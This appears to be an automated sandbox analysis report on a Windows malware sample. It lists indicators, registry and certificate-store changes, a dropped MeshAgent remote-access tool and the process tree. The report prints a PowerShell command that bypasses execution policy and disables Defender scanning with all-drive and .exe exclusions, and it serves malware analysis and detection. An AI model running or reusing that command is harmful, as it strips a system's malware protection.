Analysis
-
max time kernel
124s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
24-09-2024 03:29
Static task
static1
Behavioral task
behavioral1
Sample
2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe
Resource
win7-20240903-en
General
-
Target
2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe
-
Size
18.9MB
-
MD5
4dfdae8af85639b2c395c7b10c6bf896
-
SHA1
347bef6b6b30d1caf3af7e8709fefeec2a277071
-
SHA256
b01fbd9f1842d5d983b203735b87bc646e3a332d6d975f6e4d05e11a346691bf
-
SHA512
dcfd495f4012c051d5a5fdff7b77c8db65ef4036a6eb6d6ffe8e359f6625a4daea5dd4c851e3bc033b8eedcba09648592f02039d3ba11cd8a39f5f9a98272186
-
SSDEEP
393216:g8g8THhdWnaqtvylAjWZ0Xq9YLuxMfCVb2z:Zg8mhtvylAjWZ0Xq9YLuxMfCVKz
Malware Config
Signatures
-
Detects MeshAgent payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\naver\naver.exe family_meshagent -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 20 3660 powershell.exe 22 3660 powershell.exe 23 3660 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 2868 powershell.exe 2064 powershell.exe 3976 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
naver.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" naver.exe -
Executes dropped EXE 2 IoCs
Processes:
naver.exenaver.exepid process 5036 naver.exe 2192 naver.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 64 IoCs
Processes:
naver.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\rpcrt4.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\shell32.pdb naver.exe File opened for modification C:\Windows\System32\dll\shcore.pdb naver.exe File opened for modification C:\Windows\System32\symbols\exe\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\ntdll.pdb naver.exe File opened for modification C:\Windows\System32\dll\comctl32.pdb naver.exe File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb naver.exe File opened for modification C:\Windows\System32\dbghelp.pdb naver.exe File opened for modification C:\Windows\System32\gdiplus.pdb naver.exe File opened for modification C:\Windows\System32\ncrypt.pdb naver.exe File opened for modification C:\Windows\System32\dll\kernelbase.pdb naver.exe File opened for modification C:\Windows\System32\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\dll\msvcp_win.pdb naver.exe File opened for modification C:\Windows\System32\Kernel.Appcore.pdb naver.exe File opened for modification C:\Windows\System32\dll\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\combase.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb naver.exe File opened for modification C:\Windows\System32\dll\ws2_32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\rpcrt4.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb naver.exe File opened for modification C:\Windows\System32\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb naver.exe File opened for modification C:\Windows\System32\dll\gdiplus.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\bcrypt.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\kernel32.pdb naver.exe File opened for modification C:\Windows\System32\dll\rpcrt4.pdb naver.exe File opened for modification C:\Windows\System32\ucrtbase.pdb naver.exe File opened for modification C:\Windows\System32\advapi32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ntasn1.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb naver.exe File opened for modification C:\Windows\System32\bcryptprimitives.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb naver.exe File opened for modification C:\Windows\System32\kernelbase.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ucrtbase.pdb naver.exe File opened for modification C:\Windows\System32\dll\win32u.pdb naver.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys naver.exe File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb naver.exe File opened for modification C:\Windows\System32\win32u.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\dll\dbghelp.pdb naver.exe File opened for modification C:\Windows\System32\ntasn1.pdb naver.exe File opened for modification C:\Windows\System32\dll\ntasn1.pdb naver.exe File opened for modification C:\Windows\System32\dll\user32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\user32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb naver.exe File opened for modification C:\Windows\System32\exe\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\DLL\dbgcore.pdb naver.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ACF87FF98E1EEF3E8BDBF7A9EB64B06CF2BDE3D5 naver.exe File opened for modification C:\Windows\System32\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\shcore.pdb naver.exe File opened for modification C:\Windows\System32\dll\shell32.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\F33F806F032136DC54AFC3EA1B57FBCB325C22E0 naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\0BAF0E556ED1305266A37277DFD1935DBD98B214 naver.exe File opened for modification C:\Windows\System32\dll\ucrtbase.pdb naver.exe -
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.exenaver.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" naver.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716222161613689" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" naver.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe -
Processes:
2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exemsedge.exepid process 3660 powershell.exe 3660 powershell.exe 2064 powershell.exe 2064 powershell.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe 4044 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exemsedge.exechrome.exepowershell.exewmic.exewmic.exewmic.exedescription pid process Token: SeDebugPrivilege 3660 powershell.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 4044 msedge.exe Token: SeDebugPrivilege 2532 chrome.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeAssignPrimaryTokenPrivilege 692 wmic.exe Token: SeIncreaseQuotaPrivilege 692 wmic.exe Token: SeSecurityPrivilege 692 wmic.exe Token: SeTakeOwnershipPrivilege 692 wmic.exe Token: SeLoadDriverPrivilege 692 wmic.exe Token: SeSystemtimePrivilege 692 wmic.exe Token: SeBackupPrivilege 692 wmic.exe Token: SeRestorePrivilege 692 wmic.exe Token: SeShutdownPrivilege 692 wmic.exe Token: SeSystemEnvironmentPrivilege 692 wmic.exe Token: SeUndockPrivilege 692 wmic.exe Token: SeManageVolumePrivilege 692 wmic.exe Token: SeAssignPrimaryTokenPrivilege 692 wmic.exe Token: SeIncreaseQuotaPrivilege 692 wmic.exe Token: SeSecurityPrivilege 692 wmic.exe Token: SeTakeOwnershipPrivilege 692 wmic.exe Token: SeLoadDriverPrivilege 692 wmic.exe Token: SeSystemtimePrivilege 692 wmic.exe Token: SeBackupPrivilege 692 wmic.exe Token: SeRestorePrivilege 692 wmic.exe Token: SeShutdownPrivilege 692 wmic.exe Token: SeSystemEnvironmentPrivilege 692 wmic.exe Token: SeUndockPrivilege 692 wmic.exe Token: SeManageVolumePrivilege 692 wmic.exe Token: SeAssignPrimaryTokenPrivilege 516 wmic.exe Token: SeIncreaseQuotaPrivilege 516 wmic.exe Token: SeSecurityPrivilege 516 wmic.exe Token: SeTakeOwnershipPrivilege 516 wmic.exe Token: SeLoadDriverPrivilege 516 wmic.exe Token: SeSystemtimePrivilege 516 wmic.exe Token: SeBackupPrivilege 516 wmic.exe Token: SeRestorePrivilege 516 wmic.exe Token: SeShutdownPrivilege 516 wmic.exe Token: SeSystemEnvironmentPrivilege 516 wmic.exe Token: SeUndockPrivilege 516 wmic.exe Token: SeManageVolumePrivilege 516 wmic.exe Token: SeAssignPrimaryTokenPrivilege 516 wmic.exe Token: SeIncreaseQuotaPrivilege 516 wmic.exe Token: SeSecurityPrivilege 516 wmic.exe Token: SeTakeOwnershipPrivilege 516 wmic.exe Token: SeLoadDriverPrivilege 516 wmic.exe Token: SeSystemtimePrivilege 516 wmic.exe Token: SeBackupPrivilege 516 wmic.exe Token: SeRestorePrivilege 516 wmic.exe Token: SeShutdownPrivilege 516 wmic.exe Token: SeSystemEnvironmentPrivilege 516 wmic.exe Token: SeUndockPrivilege 516 wmic.exe Token: SeManageVolumePrivilege 516 wmic.exe Token: SeAssignPrimaryTokenPrivilege 2216 wmic.exe Token: SeIncreaseQuotaPrivilege 2216 wmic.exe Token: SeSecurityPrivilege 2216 wmic.exe Token: SeTakeOwnershipPrivilege 2216 wmic.exe Token: SeLoadDriverPrivilege 2216 wmic.exe Token: SeSystemtimePrivilege 2216 wmic.exe Token: SeBackupPrivilege 2216 wmic.exe Token: SeRestorePrivilege 2216 wmic.exe Token: SeShutdownPrivilege 2216 wmic.exe Token: SeSystemEnvironmentPrivilege 2216 wmic.exe Token: SeUndockPrivilege 2216 wmic.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exepowershell.exemsedge.exechrome.exenaver.exedescription pid process target process PID 4304 wrote to memory of 3660 4304 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe powershell.exe PID 4304 wrote to memory of 3660 4304 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe powershell.exe PID 4304 wrote to memory of 2064 4304 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe powershell.exe PID 4304 wrote to memory of 2064 4304 2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe powershell.exe PID 3660 wrote to memory of 4044 3660 powershell.exe msedge.exe PID 3660 wrote to memory of 4044 3660 powershell.exe msedge.exe PID 3660 wrote to memory of 4044 3660 powershell.exe msedge.exe PID 3660 wrote to memory of 4044 3660 powershell.exe msedge.exe PID 4044 wrote to memory of 2532 4044 msedge.exe chrome.exe PID 4044 wrote to memory of 2532 4044 msedge.exe chrome.exe PID 4044 wrote to memory of 2532 4044 msedge.exe chrome.exe PID 4044 wrote to memory of 2532 4044 msedge.exe chrome.exe PID 2532 wrote to memory of 3976 2532 chrome.exe powershell.exe PID 2532 wrote to memory of 3976 2532 chrome.exe powershell.exe PID 2532 wrote to memory of 5036 2532 chrome.exe naver.exe PID 2532 wrote to memory of 5036 2532 chrome.exe naver.exe PID 2192 wrote to memory of 692 2192 naver.exe wmic.exe PID 2192 wrote to memory of 692 2192 naver.exe wmic.exe PID 2192 wrote to memory of 516 2192 naver.exe wmic.exe PID 2192 wrote to memory of 516 2192 naver.exe wmic.exe PID 2192 wrote to memory of 2216 2192 naver.exe wmic.exe PID 2192 wrote to memory of 2216 2192 naver.exe wmic.exe PID 2192 wrote to memory of 1652 2192 naver.exe wmic.exe PID 2192 wrote to memory of 1652 2192 naver.exe wmic.exe PID 2192 wrote to memory of 4600 2192 naver.exe wmic.exe PID 2192 wrote to memory of 4600 2192 naver.exe wmic.exe PID 2192 wrote to memory of 1820 2192 naver.exe wmic.exe PID 2192 wrote to memory of 1820 2192 naver.exe wmic.exe PID 2192 wrote to memory of 2868 2192 naver.exe powershell.exe PID 2192 wrote to memory of 2868 2192 naver.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-24_4dfdae8af85639b2c395c7b10c6bf896_hijackloader_poet-rat_snatch.exe"1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3660 -
